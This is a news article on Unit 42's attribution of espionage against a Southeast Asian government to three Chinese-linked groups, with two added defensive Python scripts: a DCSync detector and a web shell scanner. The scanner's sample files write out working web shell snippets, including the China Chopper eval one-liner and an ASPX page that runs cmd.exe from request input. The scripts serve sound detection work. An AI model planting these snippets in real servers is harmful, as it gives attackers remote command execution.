A series of attacks targeting a Southeast Asian government has been found to have been carried out by distinct threat actors affiliated with Chinese interests, according to Unit 42, the Palo Alto Networks research arm that has been closely studying the attacks.

Initially thought to be the work of a single threat actor, the attacks are now said to have been carried out by three separate threat actors, with their activities grouped into different clusters that sometimes overlapped in time.

The operation was assessed to be nation-state cyberespionage in which multiple critical government entities of one country were compromised. Unit 42 did not disclose the name of the Southeast Asian country targeted.

“The techniques and tools observed during the attacks, along with the persistent long-term surveillance efforts made by the different attackers, suggest the work of advanced persistent threats (APTs),” Unit 42 said in a blog post. “In our analysis, we were able to attribute the three clusters to known APT groups with different levels of confidence.”

The APT groups attributed in the post are Stately Taurus (aka Mustang Panda), Alloy Taurus (aka GALLIUM), and Gelsemium.

Chinese APTs stole credentials

Both Stately Taurus and Alloy Taurus are believed to be APT groups operating on behalf of Chinese state interests. In this case, they are believed to have backdoored victim systems to gain entry and then used that access for reconnaissance, credential theft, and persistence.

“With moderate-high confidence, we conclude that (one cluster of) activity is linked to the Chinese cyberespionage group Stately Taurus,” Unit 42 said.
“This attribution is underpinned by the utilization of distinctive, rare tools such as the ToneShell backdoor that have not been publicly documented in association with any other known threat actor.”

Additionally, the blog attributed to Alloy Taurus, “with a moderate level of confidence,” another cluster of multi-wave intrusions that exploited vulnerabilities in Exchange servers to deploy a large number of web shells.

The APTs conducted reconnaissance on the breached networks using a range of tools, including the Chinese open source scanning framework LadonGo, the NetBIOS/IP scanner NBTScan, the Active Directory query tool ADFind, and Impacket. For credential theft, the attackers used credential harvesting tools such as Hdump and Mimikatz, including Mimikatz's DCSync technique, which abuses directory replication rights to pull password hashes from a domain controller.

After the initial infection, the state actors installed additional tools and malware to maintain a foothold in the environment and establish persistence, among them the Cobalt Strike penetration testing framework (its Beacon payload) and the Quasar remote access Trojan (RAT). They also tunneled traffic using the command-line tools PuTTY Link (Plink), for SSH tunneling, and HTran, a connection-bouncing proxy.

Rare backdooring by Gelsemium APT

With a “moderate level of confidence,” Unit 42 attributed a third cluster to the Gelsemium group, which is not linked to any specific state, based on a rare combination of malware.

“This assessment is based on the unique combination of malware that attackers used, namely the SessionManager IIS backdoor and OwlProxy,” Unit 42 said. “The cluster featured a combination of rare tools and techniques that the threat actor leveraged to gain a clandestine foothold and collect intelligence from sensitive servers belonging to a government entity in Southeast Asia.”

Threat actors responsible for the attacks in this cluster gained initial access to the environment by installing several web shells on a compromised web server, Unit 42 said.
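DCSync, mentioned above, is worth hunting for because it leaves a concrete trace: a non-domain-controller account requesting the directory replication control-access rights. The script below is an added example written for this page, not code from Unit 42 or from any of the tools named in the report. It runs a simple detector over a handful of constructed Windows Security event 4662 records (field names and the "Properties" rendering are assumptions for the example; real events carry the same GUIDs inside an XML/EVTX payload), flagging any subject that asks for DS-Replication-Get-Changes or DS-Replication-Get-Changes-All and is not on an allowlist of known replicators (domain controllers and, hypothetically, an Azure AD Connect service account).

```python
"""Hunt for DCSync-style replication requests in Windows Security event 4662 records.

Added example for this article; not from the Unit 42 report. The event records
below are constructed, not real telemetry.
"""
import re

# Control-access-right GUIDs that a DCSync needs. These two values are the
# real Active Directory extended-right GUIDs.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Accounts allowed to replicate: DC machine accounts and a hypothetical
# Azure AD Connect account. This allowlist is an assumption for the example;
# build yours from the DCs' computer objects and any known sync accounts.
KNOWN_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3"}

GUID_RE = re.compile(
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I
)

# Constructed sample events. "Properties" mimics the access-mask plus GUID
# list that 4662 carries; "ObjectType" is shown here as the class name for
# readability (real events often render it as the schema class GUID).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": f"Control Access {{{DS_REPL_GET_CHANGES}}} {{{DS_REPL_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "ObjectType": "domainDNS",
     "Properties": f"Control Access {{{DS_REPL_GET_CHANGES}}} {{{DS_REPL_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "ObjectType": "user",
     "Properties": "Read Property {bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "jsmith", "ObjectType": "",
     "Properties": ""},
]


def replication_guids(properties: str) -> set[str]:
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return found & REPLICATION_RIGHTS


def is_dcsync_candidate(event: dict, known: set[str] = KNOWN_REPLICATORS) -> bool:
    """True when a non-allowlisted subject requests directory replication rights."""
    if event.get("EventID") != 4662:
        return False
    if not replication_guids(event.get("Properties", "")):
        return False
    return event.get("SubjectUserName", "") not in known


def hunt(events: list[dict], known: set[str] = KNOWN_REPLICATORS) -> list[str]:
    """Subjects that look like DCSync, in the order they appear in the log."""
    return [e["SubjectUserName"] for e in events if is_dcsync_candidate(e, known)]


if __name__ == "__main__":
    for subject in hunt(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}")
```

The allowlist is the part that needs care in a real environment: a stale or over-broad list hides exactly the account an attacker would choose, so regenerate it from the domain controllers' computer objects rather than maintaining it by hand, and treat any interactive user account requesting these rights as a high-priority alert.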
These web shells included reGeorg, China Chopper, and AspxSpy. Previous research confirms that the Gelsemium threat group has targeted the government sector in Southeast Asia in the past, Unit 42 added.
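The three web shells named above each have a recognizable on-disk fingerprint, which is the cheapest place to start a hunt on an IIS server. The scanner below is an added example written for this article, not tooling from Unit 42 or from the report. It checks a set of constructed ASPX files (the paths and contents are made up for the example) against signatures for the China Chopper ASPX one-liner, reGeorg's tunnel script, and AspxSpy, plus a weaker generic heuristic for any page that spawns a process from request input. The signature strings are drawn from the publicly available source of those tools; treat the generic rule as a lead, not a verdict.

```python
"""Scan ASPX files for known web shell fingerprints.

Added example for this article, not from the Unit 42 report. The file set
below is constructed; point scan_files() at a real web root by reading
the .aspx/.ashx/.asmx files into the same {path: content} shape.
"""
import re

# Signatures. The first three match strings from the tools' public source;
# the generic rule is a heuristic and will need tuning for real sites.
SIGNATURES = {
    "China Chopper (ASPX eval one-liner)":
        re.compile(r'eval\s*\(\s*Request\.Item\s*\[', re.I),
    "reGeorg tunnel":
        re.compile(r"Georg says, 'All seems fine'"),
    "ASPXSpy":
        re.compile(r"ASPXSpy", re.I),
}
GENERIC_EXEC = re.compile(r"Process\.Start\s*\(", re.I)
GENERIC_INPUT = re.compile(r"\bRequest(\.Item|\.Form|\.QueryString)?\s*\[", re.I)

# Constructed sample web root: one benign page and three planted shells.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\iisstart.aspx":
        '<%@ Page Language="C#" %><html><body>Welcome</body></html>',
    r"C:\inetpub\wwwroot\aspnet_client\t.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    r"C:\inetpub\wwwroot\tunnel.aspx":
        '<%@ Page Language="C#" %><% if (Request.HttpMethod == "GET") '
        '{ Response.Write("Georg says, \'All seems fine\'"); } %>',
    r"C:\inetpub\wwwroot\owa\auth\cmd.aspx":
        '<%@ Page Language="C#" %><% var p = System.Diagnostics.Process.Start('
        '"cmd.exe", "/c " + Request["c"]); %>',
}


def classify(content: str) -> list[str]:
    """Return the names of every signature the file content matches."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(content)]
    if GENERIC_EXEC.search(content) and GENERIC_INPUT.search(content):
        hits.append("generic: process spawned from request input")
    return hits


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Map each suspicious path to its matched signatures; clean files are omitted."""
    findings = {}
    for path, content in files.items():
        hits = classify(content)
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Content signatures only catch shells an analyst has already seen, so pair this with two things the report's clusters would also expose: a baseline of the web root's file list and modification times (a fresh `.aspx` under `aspnet_client` or `owa\auth` is suspicious regardless of contents), and IIS logs filtered for POST requests to those newly created paths.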